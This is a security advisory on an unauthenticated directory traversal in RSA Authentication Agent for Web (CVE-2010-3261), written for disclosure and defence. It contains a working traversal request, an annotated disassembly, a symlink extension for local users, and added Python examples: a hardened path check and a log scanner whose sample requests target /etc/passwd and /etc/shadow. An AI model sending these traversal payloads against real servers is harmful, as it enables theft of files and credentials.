
Security Advisory 10-001 – mod_rsawebagent Is Vulnerable To Directory Traversal


Vulnerability Title:

mod_rsawebagent Is Vulnerable To Directory Traversal


Vulnerable System:

RSA Authentication Agent for Web

Vulnerability discovery and development:

Portcullis Security Testing Services. Further research was then carried out and the vendor notified.

Credit for Discovery:

Tim Brown – Portcullis Computer Security Ltd.

Affected systems:

All known versions of RSA Authentication Agent for Web for Apache Web Server; the vulnerability was confirmed on mod_rsawebagent/7.0.0[315]. The vendor subsequently confirmed that both RSA Authentication Agent 7.0 for Web for Apache Web Server and RSA Authentication Agent 7.0 for Web for Internet Information Services are affected. The vendor was unable to reproduce this issue on older releases.

Details:

RSA Authentication Agent for Web for Apache Web Server allows you to protect all or selected web pages with RSA SecurID. The agent, residing on the web server, intercepts all user requests for protected web pages. When a user attempts to access a URL that RSA SecurID protects, the agent requests the username and passcode and passes them to RSA Authentication Manager for authentication. If the authentication is successful, the agent stores the information in a cookie in the user’s browser. As long as the cookie remains valid, the user is granted access to protected web pages.

It is possible to pass a value in the image parameter of the GetPic handler of the web authentication URL (/webauthentication?GetPic?image=...) which causes arbitrary files with the .jpg extension to be returned from outside the web root, as follows:

GET /webauthentication?GetPic?image=../../../../../../../usr/share/cups/doc-root/images/smiley HTTP/1.0


The value of the parameter is first URL-decoded and then used as an argument to snprintf with the format string “%s/%s.%s” within the CHTMLString::GetDefaultTemplate method:

CHTMLString::GetDefaultTemplate(char const*image, char const*arg1, unsigned int*root):
   0x00007f62edba638a <+0>:     mov    %rbx,-0x30(%rsp)
   0x00007f62edba638f <+5>:     mov    %rbp,-0x28(%rsp)
   0x00007f62edba6394 <+10>:    mov    %r12,-0x20(%rsp)
   0x00007f62edba6399 <+15>:    mov    %r13,-0x18(%rsp)
   0x00007f62edba639e <+20>:    mov    %r14,-0x10(%rsp)
   0x00007f62edba63a3 <+25>:    mov    %r15,-0x8(%rsp)
   0x00007f62edba63a8 <+30>:    sub    $0x558,%rsp
   0x00007f62edba63af <+37>:    mov    %rdi,%r14 ; set $r14 to $rdi (arg1)
   0x00007f62edba63b2 <+40>:    mov    %rsi,%rbx ; set $rbx to $rsi (image)
   0x00007f62edba63b5 <+43>:    mov    %rdx,%r12 ; set $r12 to $rdx (root)
   0x00007f62edba63b8 <+46>:    mov    %rcx,%r15 ; set $r15 to $rcx (arg3)
   0x00007f62edba63bb <+49>:    lea    0x20e69(%rip),%r8  ; set $r8 (arg4) to "Entering GetDefaultTemplate()"
   0x00007f62edba63c2 <+56>:    mov    $0x486,%ecx ; $ecx (arg3) = 1158
   0x00007f62edba63c7 <+61>:    lea    0x20dee(%rip),%rdx ; set $rdx (arg2) to "genhtml.cpp"
   0x00007f62edba63ce <+68>:    mov    $0x9,%esi ; $esi (arg1) = 9
   0x00007f62edba63d3 <+73>:    mov    $0x2,%edi ; $edi (arg0) = 2
   0x00007f62edba63d8 <+78>:    mov    $0x0,%eax ; $eax = 0
   0x00007f62edba63dd <+83>:    callq  0x7f62edb7d818  ; SDTraceMessage(2, 9, "genhtml.cpp", 1158, "Entering GetDefaultTemplate()");
   0x00007f62edba63e2 <+88>:    lea    0x10(%rsp),%rbp ; set $rbp to ""
   0x00007f62edba63e7 <+93>:    mov    0x20(%r14),%r9 ; set $r9 (args2) to "jpg" (from arg1)
   0x00007f62edba63eb <+97>:    mov    %rbx,%r8 ; set $r8 (args1) to "../../../../../../../usr/share/cups/doc-root/images/smiley" (from image)
   0x00007f62edba63ee <+100>:   mov    %r12,%rcx ; set $rcx (args0) to "/opt/apache2/rsawebagent/Templates" (from root)
   0x00007f62edba63f1 <+103>:   lea    0x20eb6(%rip),%rdx ; set $rdx (format) to "%s/%s.%s"
   0x00007f62edba63f8 <+110>:   mov    $0x400,%esi ; $esi (size) = 1024
   0x00007f62edba63fd <+115>:   mov    %rbp,%rdi ; set $rdi (str) to ""
   0x00007f62edba6400 <+118>:   mov    $0x0,%eax ; $eax (nwritten) = 0
=> 0x00007f62edba6405 <+123>:   callq  0x7f62edb7cee8 <snprintf@plt> ; snprintf(str, 1024, "%s/%s.%s", "/opt/apache2/rsawebagent/Templates", "../../../../../../../usr/share/cups/doc-root/images/smiley", "jpg");
   0x00007f62edba640a <+128>:   dec    %eax ; $eax = nwritten - 1
   0x00007f62edba640c <+130>:   cmp    $0x3fe,%eax ; is nwritten - 1 <= 1022, i.e. did the whole string fit in the 1024 byte buffer?
   0x00007f62edba6411 <+135>:   jbe    0x7f62edba644f <_ZN11CHTMLString18GetDefaultTemplateEPKcS1_Pj+197> ; yes: carry on with the template path
   0x00007fbb34042413 <+137>:   movb   $0x0,0x40f(%rsp) ; no: str[1023] = 0 (force NUL termination), then log and bail out
   0x00007fbb3404241b <+145>:   mov    %rbp,%r9 ; set $r9 (args5) to $rbp (str)
   0x00007fbb3404241e <+148>:   lea    0x213c3(%rip),%r8 ; set $r8 (arg4) to "Leaving GetDefaultTemplate(), buffer overflow for template %s"
   0x00007fbb34042425 <+155>:   mov    $0x492,%ecx ; $ecx (arg3) = 1170
   0x00007fbb3404242a <+160>:   lea    0x20d8b(%rip),%rdx ; set $rdx (arg2) to "genhtml.cpp"
   0x00007fbb34042431 <+167>:   mov    $0x9,%esi ; $esi (arg1) = 9
   0x00007fbb34042436 <+172>:   mov    $0x4,%edi ; $edi (arg0) = 4
   0x00007fbb3404243b <+177>:   mov    $0x0,%eax ; $eax = 0
   0x00007fbb34042440 <+182>:   callq  0x7fbb34019818  ; SDTraceMessage(4, 9, "genhtml.cpp", 1170, "Leaving GetDefaultTemplate(), buffer overflow for template %s", "/opt/apache2/rsawebagent/Templates/../../../../../../../usr/share/cups/doc-root/images/smiley.jpg");
   0x00007fbb34042445 <+187>:   mov    $0x0,%eax ; $eax = 0
   ...


This results in the path /opt/apache2/rsawebagent/Templates/../../../../../../../usr/share/cups/doc-root/images/smiley.jpg being returned by GetDefaultTemplate. The path is then stat’d to confirm that it exists before it is passed to CHTMLString::ReadTemplate, which opens, stats and then reads the file into freshly allocated memory, from where it is served to the client. Note that no credentials are required to perform this attack.

A user with access to the underlying host, either via a normal shell or for example via sftp, can extend this attack to files that do not end in .jpg: they create a hard or symbolic link with a .jpg extension, in any location to which they have write access, pointing at any file readable by the web server user, and then request that link through the traversal in order to read it.

Interestingly, if snprintf reports that 1024 or more bytes would have been written (i.e. the output was truncated; after the dec, $eax is greater than 1022), the code treats this as a potential buffer overflow and logs an error before returning. At a guess the code originally used sprintf and this check was a primitive attempt to catch stack overflows; it is a length check only and does nothing to stop traversal.
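The following is an added example, not code from this advisory or from RSA: a Python model of the path construction described above (URL-decode, then "%s/%s.%s", then the 1024-byte truncation check) next to a hardened replacement that allow-lists the decoded name and canonicalises the result with realpath before confirming it still lies under the template root. It is exercised against a constructed directory layout in a temporary directory (the names base/opt/rsawebagent/Templates, etc/secret.jpg, logo.jpg and shortcut.jpg are hypothetical) so that it shows the remote traversal, the percent-encoded variant, the local-user symlink extension and the only check the agent does make, the over-long name.

```python
# Added example (not Portcullis' or RSA's code): a Python model of the
# GetDefaultTemplate path construction plus a hardened replacement, exercised
# against a constructed directory layout in a temporary directory.
import os
import tempfile
from urllib.parse import unquote

TEMPLATE_ROOT = "/opt/apache2/rsawebagent/Templates"  # root seen in the advisory
BUF_SIZE = 1024                                       # snprintf buffer size


class TemplateError(Exception):
    """Raised where the agent would log an error and refuse the request."""


def vulnerable_template_path(root, image, ext="jpg"):
    """Mirror of the vulnerable logic: URL-decode, then "%s/%s.%s".

    snprintf returns the length the full string would have had, so a result
    of 1024 or more means the 1024-byte buffer was truncated; the agent treats
    that as a buffer overflow and aborts. Nothing else is checked, so ".."
    segments (and symlinks) pass straight through.
    """
    path = "%s/%s.%s" % (root, unquote(image), ext)
    if len(path.encode()) >= BUF_SIZE:
        raise TemplateError("buffer overflow for template %s" % path)
    return path


def hardened_template_path(root, image, ext="jpg"):
    """Allow-list the decoded name, then canonicalise and check containment.

    The allow-list alone stops "../" traversal; the realpath containment
    check additionally defeats the symlink trick, where a local user plants
    root/anything.jpg -> /some/other/file.
    """
    name = unquote(image)
    if not name or not all(c.isalnum() or c in "-_" for c in name):
        raise TemplateError("rejected template name %r" % name)
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(os.path.join(real_root, name + "." + ext))
    if os.path.commonpath([real_root, real_path]) != real_root:
        raise TemplateError("%s resolves outside %s" % (real_path, real_root))
    return real_path


def _reads(path, expected):
    """True if the file at path exists and holds the expected text."""
    try:
        with open(path) as f:
            return f.read() == expected
    except OSError:
        return False


def _raises(func, *args):
    """True if func(*args) raises TemplateError."""
    try:
        func(*args)
    except TemplateError:
        return True
    return False


def demo():
    """Constructed scenario (hypothetical names): a Templates root three
    levels below a temp directory, a secret outside it, a genuine template
    inside it, and a symlink inside it pointing at the secret."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "opt", "rsawebagent", "Templates")
        os.makedirs(root)
        secret = os.path.join(base, "etc", "secret.jpg")
        os.makedirs(os.path.dirname(secret))
        with open(secret, "w") as f:
            f.write("not a picture\n")
        with open(os.path.join(root, "logo.jpg"), "w") as f:
            f.write("JPEG bytes\n")
        os.symlink(secret, os.path.join(root, "shortcut.jpg"))

        traversal = "../../../etc/secret"  # three levels up to base, then etc/
        # Remote, unauthenticated traversal
        results["vuln_traversal"] = _reads(vulnerable_template_path(root, traversal), "not a picture\n")
        results["hard_traversal"] = _raises(hardened_template_path, root, traversal)
        # Percent-encoded variant: decoded before use, exactly as in the agent
        results["vuln_encoded"] = _reads(vulnerable_template_path(root, "..%2F..%2F..%2Fetc%2Fsecret"), "not a picture\n")
        # Local-user symlink extension: the requested name itself looks harmless
        results["vuln_symlink"] = _reads(vulnerable_template_path(root, "shortcut"), "not a picture\n")
        results["hard_symlink"] = _raises(hardened_template_path, root, "shortcut")
        # A legitimate template still works with the hardened version
        results["hard_legit"] = _reads(hardened_template_path(root, "logo"), "JPEG bytes\n")
        # The agent's only check: an over-long name trips the truncation test
        results["vuln_overflow"] = _raises(vulnerable_template_path, root, "A" * 1100)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-15s %s" % (key, value))
```

Running the script prints True for every entry of demo(): the vulnerable construction serves the file outside the root for the plain, encoded and symlink cases and only refuses the over-long name, while the hardened version refuses all three and still serves logo.jpg. The containment check is done on the realpath of both sides so that a symlink inside the root cannot smuggle a path outside it, which a plain string prefix check would miss.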

In the process of researching this vulnerability, two further undocumented parameters, GetFile?file and GetStyleSheet?style, were identified which have the same issue. Whilst the former sounds useful, in practice it was determined that GetFile can only be used to access files with the .htm extension. Moreover, both undocumented parameters require valid credentials to access their functionality in the agent’s default configuration.
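For anyone looking back through web server logs for attempts against the three handlers named above, the following is an added example (not from this advisory or from RSA) that scans Apache combined-format access log lines for requests to /webauthentication whose GetPic, GetFile or GetStyleSheet file-name parameter contains a ".." segment once percent-encoding (including double encoding) has been removed. The log lines and IP addresses are constructed for illustration and the combined log format is an assumption.

```python
# Added example (not Portcullis' or RSA's code): flag access-log entries that
# target the agent's file-serving handlers with a traversal in the file-name
# parameter. The log lines below are constructed for illustration.
import re
from urllib.parse import unquote

# Handler -> file-name parameter, as named in the advisory
AGENT_HANDLERS = {"GetPic": "image", "GetFile": "file", "GetStyleSheet": "style"}

# Apache "combined" log format (assumed for this example)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Request target shape used by the agent: /webauthentication?Handler?param=value
TARGET_RE = re.compile(
    r'^/webauthentication\?(?P<handler>\w+)\?(?P<param>\w+)=(?P<value>.*)$'
)


def decode_fully(value, rounds=3):
    """Undo layered percent-encoding (e.g. %252e%252e -> %2e%2e -> ..)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """True if any path segment of the decoded value is '..'."""
    segments = decode_fully(value).replace("\\", "/").split("/")
    return ".." in segments


def scan_access_log(lines):
    """Return one dict per log line that carries a traversal to an agent handler."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        t = TARGET_RE.match(m.group("target"))
        if not t or AGENT_HANDLERS.get(t.group("handler")) != t.group("param"):
            continue
        if is_traversal(t.group("value")):
            hits.append({
                "ip": m.group("ip"),
                "handler": t.group("handler"),
                "path": decode_fully(t.group("value")),
                "status": int(m.group("status")),
            })
    return hits


# Constructed sample: one benign GetPic, the advisory's request, an encoded
# variant, a double-encoded GetFile attempt, a benign stylesheet, an unrelated hit.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Sep/2010:10:15:01 +0100] "GET /webauthentication?GetPic?image=logo HTTP/1.0" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Sep/2010:10:15:09 +0100] "GET /webauthentication?GetPic?image=../../../../../../../usr/share/cups/doc-root/images/smiley HTTP/1.0" 200 1462 "-" "curl/7.19.7"',
    '198.51.100.7 - - [22/Sep/2010:10:15:12 +0100] "GET /webauthentication?GetPic?image=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 312 "-" "curl/7.19.7"',
    '198.51.100.7 - - [22/Sep/2010:10:15:20 +0100] "GET /webauthentication?GetFile?file=..%252f..%252fetc%252fshadow HTTP/1.1" 401 0 "-" "curl/7.19.7"',
    '192.0.2.10 - - [22/Sep/2010:10:16:00 +0100] "GET /webauthentication?GetStyleSheet?style=default HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [22/Sep/2010:10:16:03 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("%(ip)s %(handler)s %(status)d %(path)s" % hit)
```

On the sample it reports three lines: the unauthenticated GetPic traversal that succeeded (200), the encoded GetPic attempt that missed (404), and the double-encoded GetFile attempt that was refused for lack of credentials (401). A 200 against GetPic with a traversal is the one to treat as a confirmed read; the other two show the same attacker probing the authenticated handlers.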

Impact:

An unauthenticated remote attacker can read arbitrary files with a .jpg extension that are readable by the web server user from anywhere on the file system; a user with local write access can extend this to any file readable by the web server user by linking to it under a .jpg name.

Exploit:

Exploit code is not required.

Vendor status:

05/07/2010 – Vendor informed via email

07/07/2010 – Vendor responds confirming receipt and requesting further information about the platform on which the issue was discovered

14/07/2010 – Vendor confirms the issue and commits to providing an update in due course

30/07/2010 – Vendor suggests a disclosure date of 20/09/2010

10/09/2010 – Vendor confirms the disclosure date of 20/09/2010 and informs Portcullis that CVE-2010-3261 has been assigned to this issue

21/09/2010 – Vendor confirms that the patch and advisory were released to their customers on 20/09/2010

22/09/2010 – Publication

Copyright:

Copyright © Portcullis Computer Security Limited 2010, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.